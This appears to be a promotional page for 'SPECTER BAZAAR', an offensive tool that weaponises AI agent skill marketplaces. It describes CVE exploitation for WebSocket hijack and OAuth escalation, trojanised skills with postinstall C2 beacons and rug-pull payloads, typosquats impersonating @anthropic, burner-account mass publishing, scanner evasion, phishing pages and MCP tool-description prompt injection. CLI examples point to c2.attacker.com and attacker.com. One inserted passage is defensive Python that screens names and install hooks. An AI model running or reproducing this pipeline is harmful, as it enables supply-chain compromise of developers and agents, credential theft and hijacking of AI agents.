NIGHTFALL Tool 95 — WMD-Class — OPEN / INJECT / UNLEASHED

SPECTER BAZAAR

AI Agent App Store & Skill Marketplace Attack Engine — Weaponises the skill supply chain across ClawHub, Smithery, OpenTools, MCP.run, and Glama. ClawHavoc-class distribution poisoning. 135,000+ exposed agents.

325 Tests
5 Marketplaces
4 CVEs
99.5% BadSkill ASR
OPEN / INJECT / UNLEASHED Gate

Five AI Skill Marketplaces

135,000+ AI agents exposed across the public skill marketplace ecosystem. Each platform is an active supply chain attack surface.

ClawHub
Primary target — CVE-2026-25253 WebSocket hijack, CVE-2026-32922 OAuth scope escalation
Smithery
dockerBuildPath path traversal — arbitrary file read from build container
OpenTools
Cross-platform repackaging — clawhub_skill_md / npm_package_json dual format
MCP.run
MCP tool description line-jumping — Trail of Bits prompt injection surface
Glama
Namespace squatting and shadow skill registration — combosquat + scope injection

Four Weaponised Vulnerabilities

Marketplace infrastructure vulnerabilities that enable unauthenticated agent hijack, OAuth privilege escalation, and auth bypass at CVSS 8.8–9.9.

CVE-2026-25253
OpenClaw WebSocket Hijack
openclaw:// URI scheme triggers unauthenticated WebSocket connection to attacker-controlled server. Skill.md with crafted link redirects victim agent's tool calls. Unpatched in OpenClaw < 2026.1.25.
CVSS 8.8
CVE-2026-32922
ClawHub OAuth Scope Escalation
Token confusion between pairing endpoint and admin API allows initial user-scope token to escalate to admin privileges. Full marketplace account takeover via single request.
CVSS 9.9
CVE-2026-44338
PraisonAI Auth Bypass
Unauthenticated access to PraisonAI admin API endpoints. No authentication required for agent configuration read/write, tool registration, and credential exposure.
CVSS 9.1
CVE-2026-26319
Telnyx Webhook HMAC Forgery
Telnyx webhook signature verification bypass. Allows injection of forged events into Telnyx-integrated AI agent workflows — arbitrary tool invocation without valid API credentials.
CVSS 8.1

8 Subsystems

Full supply chain attack pipeline — from marketplace reconnaissance through weaponised skill distribution and infrastructure exploitation.

01 · RECON
Marketplace Enumeration
Enumerates ClawHub, Smithery, OpenTools, MCP.run, Glama via HTTP scraping and API calls. Builds NetworkX DiGraph of publisher relationships. Detects namespace ownership gaps, coordinated publishing patterns, and version velocity anomalies. Returns SkillProfile objects for downstream targeting.
OPEN Gate
02 · HARVEST
Skill Intelligence Collection
Scrapes skill manifests, package.json, and skill.yaml. Extracts declared capabilities vs actual permissions. BadSkill ASR scoring per arXiv:2604.09378 — identifies which existing skills could be trojanised with highest success probability. Publisher age, download trends, cross-platform name squatting detection.
OPEN Gate
03 · FORGE
Weaponised Skill Creation
8 payload templates: npm_postinstall_bash (C2 beacon on npm install), clawhub_skill_md (laundered skill.yaml with hidden postinstall), mcp_tool_poison (tool description line-jumping injection), rug_pull_state_machine (benign→malicious after N downloads), skill_trojan_shamir (Shamir secret-sharing split payload arXiv:2604.06811), test_file_payload (conftest.py autouse fixture), symlink_trap, png_injection. CVE-2026-25253 openclaw:// link embedded in SKILL.md.
INJECT Gate
04 · LURE
Social Engineering & Typosquatting
Typosquat generator: keyboard substitution, transposition, homoglyph, combosquat, scope injection (e.g., @anthropic/filesystem-tool). README cloner with attacker branding. Understatement metadata — declares 2 permissions, actually uses 14. Aged commit history fabrication. SEO landing page with schema.org markup for search engine visibility.
INJECT Gate
05 · PUBLISH
Automated Skill Distribution
BurnerAccountPool with quarantine management across npm, ClawHub, Smithery, OpenTools, Glama. OTP TOTP secret bypass. Takedown watch + automatic reupload with variant rotation. Blitz mode: bulk publish across credential pool at configurable rate. INJECT gate for dry-run validation. UNLEASHED gate required for live marketplace publication.
INJECT Gate (dry-run) UNLEASHED Gate (live)
06 · HIJACK
CVE Exploitation Engine
MarketplaceHijack: CVE-2026-25253 openclaw:// WebSocket session hijack (CVSS 8.8), CVE-2026-32922 OAuth scope escalation to admin (CVSS 9.9), CVE-2026-44338 PraisonAI unauthenticated admin access (CVSS 9.1), Smithery dockerBuildPath path traversal for arbitrary container file read, CVE-2026-26319 Telnyx webhook HMAC forgery, SSRF gateway probe targeting cloud metadata at 169.254.169.254. PoC mode requires no live target.
INJECT Gate
07 · ECHO
Distribution Channel Poisoning
DistributionChannelPoisoner: resolution chain TOCTOU window mapping, postinstall hook variants (npm/clawhub/conftest/cargo), shadow typosquat opportunity finder, mirror writability probe, rug-pull download-counter state machine, laundered skill.md with risk_tier:low frontmatter, scanner bypass bundle (Snyk/Cisco Umbrella/VirusTotal evasion via symlink/PNG steganography/conftest obfuscation), phishing page generator for ClawHub and Smithery impersonation.
INJECT Gate
08 · REPORT
Signed Evidence Report
Ed25519-signed BZR-{hex12} reports. Blast radius calculation: install_count × payload class severity. OWASP Agentic Skills Top 10 AST01–AST10 mapping. MITRE ATLAS AML.T0018/T0020/T0051/T0054 technique annotation. Risk score 0.0–1.0. Hash-chained evidence log. JSON/Markdown/text output.
All Gates
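
Seen from the side of whoever consumes a registry, the name tricks listed under LURE (substitution, transposition, homoglyph, combosquat, scope injection) and the install-time hooks listed under FORGE and ECHO can be screened before a skill is installed. The Python check below is an added example, not part of the tool or of any marketplace; the allowlist, the look-alike map and the sample manifest are constructed assumptions.

```python
import json
import unicodedata

# Constructed allowlist of names the organisation really installs (assumption).
TRUSTED = {"filesystem-tool", "@modelcontextprotocol/server-git"}
# Tiny constructed look-alike map; real screening needs the full Unicode confusables table.
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "\u0456": "i", "\u0435": "e",
                             "\u043e": "o", "\u0430": "a"})
INSTALL_HOOKS = ("preinstall", "install", "postinstall")  # npm scripts run at install time

def skeleton(name):
    """Fold case, compatibility forms and known look-alike characters."""
    return unicodedata.normalize("NFKC", name).lower().translate(CONFUSABLES)

def near(a, b):
    """True if a and b differ by one substituted or two swapped adjacent characters."""
    if len(a) != len(b):
        return False
    diff = [i for i in range(len(a)) if a[i] != b[i]]
    if len(diff) == 1:
        return True
    return (len(diff) == 2 and diff[1] == diff[0] + 1
            and a[diff[0]] == b[diff[1]] and a[diff[1]] == b[diff[0]])

def name_findings(candidate, trusted=TRUSTED):
    """Return sorted reasons the candidate resembles, but is not, a trusted name."""
    if candidate in trusted:
        return []
    findings = set()
    bare = candidate.rpartition("/")[2]
    for good in trusted:
        good_bare = good.rpartition("/")[2]
        if bare == good_bare:
            findings.add("scope-injection")      # same name, different scope
        elif skeleton(bare) == skeleton(good_bare):
            findings.add("homoglyph")            # differs only by look-alikes or case
        elif near(skeleton(bare), skeleton(good_bare)):
            findings.add("near-miss")            # substitution or transposition
        elif skeleton(good_bare) in skeleton(bare):
            findings.add("combosquat")           # trusted name with words added
    return sorted(findings)

def install_hooks(manifest_text):
    """Return the install-time lifecycle scripts declared in a package.json."""
    scripts = json.loads(manifest_text).get("scripts", {})
    return [hook for hook in INSTALL_HOOKS if hook in scripts]

# Constructed sample manifest, not taken from any real package.
SAMPLE = '{"name": "@anthropic/filesystem-tool", "scripts": {"postinstall": "node setup.js"}}'
```

A name with any finding, or a manifest with any install-time hook, is a reason to hold the install for manual review rather than proof of malice.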

specter-bazaar

All modes. Full pipeline or per-subsystem targeting.

# RECON — enumerate marketplaces (no key required)
$ specter-bazaar scan clawhub --limit 100

# HARVEST — scrape and score skill manifests
$ specter-bazaar harvest clawhub --mode local --out-dir ./skills

# FORGE — create weaponised skill (INJECT gate)
$ specter-bazaar forge \
    --template clawhub_skill_md \
    --skill-name google-workspace-sync \
    --c2-domain c2.attacker.com \
    --override --key ~/.nightfall/nightfall.key

# LURE — generate typosquats and laundered metadata
$ specter-bazaar lure --skill filesystem-tool \
    --scope-orgs anthropic openai \
    --c2-domain c2.attacker.com \
    --key ~/.nightfall/nightfall.key

# HIJACK — exploit marketplace CVE (INJECT gate)
$ specter-bazaar hijack --cve CVE-2026-25253 \
    --target http://localhost:39281 \
    --attacker-ws attacker.com:8765 \
    --key ~/.nightfall/nightfall.key

# PUBLISH — live publication (UNLEASHED gate — real API calls)
$ specter-bazaar publish ./my-skill-dir \
    --marketplace npm \
    --npm-token $NPM_TOKEN \
    --override --i-understand-this-is-live-publication \
    --key ~/.nightfall/nightfall.key

# FULL ASSESSMENT — all 8 subsystems
$ specter-bazaar full \
    --marketplace clawhub \
    --c2-domain c2.attacker.com \
    --gate UNLEASHED --key ~/.nightfall/nightfall.key \
    --output markdown --out-dir ./reports

MITRE ATLAS & OWASP

AML.T0018
Backdoor ML Model — SkillTrojan payload activation
AML.T0020
Poison Training Data — poisoned skill manifest injection
AML.T0051
LLM Prompt Injection — MCP tool description line-jumping
AML.T0054
Prompt Injection — openclaw:// URI-triggered WebSocket hijack
T1195.001
Supply Chain Compromise: Develop Malware
T1072
Software Deployment Tools (skill postinstall hook abuse)
AST01
Malicious Skill Publication — laundered metadata, hidden payloads
AST02
Typosquatting & Name Confusion — keyboard/homoglyph/combosquat variants
AST03
Postinstall Hook Abuse — npm/clawhub/cargo/conftest variants
AST04
Rug Pull — benign→malicious state machine after download threshold
AST05
Dependency Confusion — namespace injection into org-scoped registries
AST06
Mirror Poisoning — writable mirror injection for distribution
AST07
Scanner Evasion — Snyk/Cisco/VirusTotal bypass bundles
AST08
Credential Theft via Skill — API key harvest postinstall
AST09
Marketplace Infrastructure Exploit — CVE-2026-25253/32922/44338/26319
AST10
Phishing via Skill Lure — impersonation landing pages